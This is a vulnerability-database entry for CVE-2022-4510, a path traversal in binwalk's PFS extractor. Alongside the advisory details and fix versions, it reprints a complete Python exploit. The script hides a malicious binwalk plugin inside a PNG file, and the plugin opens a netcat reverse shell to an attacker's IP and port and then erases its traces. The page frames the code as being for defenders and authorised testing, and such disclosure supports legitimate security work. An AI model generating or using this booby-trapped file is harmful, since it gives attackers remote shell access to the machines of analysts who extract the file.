CVE-2022-4510

unknown

Published 2023-01-26 · Modified 2025-12-20

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

A path traversal vulnerability was identified in ReFirm Labs binwalk from version 2.1.2b through 2.3.3 included. By crafting a malicious PFS filesystem file, an attacker can get binwalk's PFS extractor to extract files at arbitrary locations when binwalk is run in extraction mode (-e option). Remote code execution can be achieved by building a PFS filesystem that, upon extraction, would extract a malicious binwalk module into the folder .config/binwalk/plugins. This vulnerability is associated with program files src/binwalk/plugins/unpfs.py. This issue affects binwalk from 2.1.2b through 2.3.3 included.

Predictions

Exploit likelihood

55%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-51249 remote python python · 3 KB

Etienne Lacoche · 2023-04-05

Binwalk v2.3.2 - Remote Command Execution (RCE)

python exploit Source: Exploit-DB

# Exploit Title: Binwalk v2.3.2 - Remote Command Execution (RCE)
# Exploit Author: Etienne Lacoche
# CVE-ID: CVE-2022-4510
import os
import inspect
import argparse

print("")
print("################################################")
print("------------------CVE-2022-4510----------------")
print("################################################")
print("--------Binwalk Remote Command Execution--------")
print("------Binwalk 2.1.2b through 2.3.2 included-----")
print("------------------------------------------------")
print("################################################")
print("----------Exploit by: Etienne Lacoche-----------")
print("---------Contact Twitter: @electr0sm0g----------")
print("------------------Discovered by:----------------")
print("---------Q. Kaiser, ONEKEY Research Lab---------")
print("---------Exploit tested on debian 11------------")
print("################################################")
print("")

parser = argparse.ArgumentParser()
parser.add_argument("file", help="Path to input .png file",default=1)
parser.add_argument("ip", help="Ip to nc listener",default=1)
parser.add_argument("port", help="Port to nc listener",default=1)

args = parser.parse_args()
            
if args.file and args.ip and args.port:
    header_pfs = bytes.fromhex("5046532f302e390000000000000001002e2e2f2e2e2f2e2e2f2e636f6e6669672f62696e77616c6b2f706c7567696e732f62696e77616c6b2e70790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034120000a0000000c100002e")
    lines = ['import binwalk.core.plugin\n','import os\n', 'import shutil\n','class MaliciousExtractor(binwalk.core.plugin.Plugin):\n','    def init(self):\n','        if not os.path.exists("/tmp/.binwalk"):\n','            os.system("nc ',str(args.ip)+' ',str(args.port)+' ','-e /bin/bash 2>/dev/null &")\n','            with open("/tmp/.binwalk", "w") as f:\n','                f.write("1")\n','        else:\n','            os.remove("/tmp/.binwalk")\n', '            os.remove(os.path.abspath(__file__))\n','            shutil.rmtree(os.path.join(os.path.dirname(os.path.abspath(__file__)), "__pycache__"))\n']

    in_file = open(args.file, "rb")
    data = in_file.read()
    in_file.close()
    
    with open("/tmp/plugin", "w") as f:
       for line in lines:
          f.write(line)

    with open("/tmp/plugin", "rb") as f: 
        content = f.read()

    os.system("rm /tmp/plugin")

    with open("binwalk_exploit.png", "wb") as f:
        f.write(data)
        f.write(header_pfs)
        f.write(content)

    print("")    
    print("You can now rename and share binwalk_exploit and start your local netcat listener.")
    print("")

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`2.3.4+dfsg1-1`
sid	Fixed	`2.3.4+dfsg1-1`
forky	Fixed	`2.3.4+dfsg1-1`
bullseye	Fixed	`2.3.1+dfsg1-1+deb11u1`
bookworm	Fixed	`2.3.4+dfsg1-1`

Package impact

Ecosystem	Package	Vulnerable	Fixed
PyPI	binwalk	`>=2.1.2b,<=2.3.3`

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.